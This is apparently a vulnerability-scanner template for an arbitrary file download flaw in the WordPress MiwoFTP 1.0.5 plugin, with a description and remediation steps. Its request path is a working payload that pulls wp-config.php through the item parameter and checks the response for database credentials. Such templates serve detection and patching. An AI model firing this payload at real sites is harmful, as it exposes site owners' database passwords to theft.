id: Wordpress-MiwoFTP_Plugins-ArbitraryFileDownload
info:
  name: wordpress_MiwoFTP_1.0.5_Arbitrary_File_Download
  author:
  - l0ne1y
  description: |-
    WordPress Plugin MiwoFTP 1.0.5 arbitrary file download vulnerability
    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers. MiwoFTP is one of the file manager plug-ins.

    There is a security vulnerability in version 1.0.5 of the WordPress MiwoFTP plugin. This vulnerability allows remote attackers to read arbitrary files in the system through the item parameter.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/miwoftp/changelog/

    Temporary fix:
    1. Filter \".\" so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: dsl
    dsl:
    - contains(body,"DB_PASSWORD") && status_code==200 && contains(body,"DB_USER")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes'
  method: GET
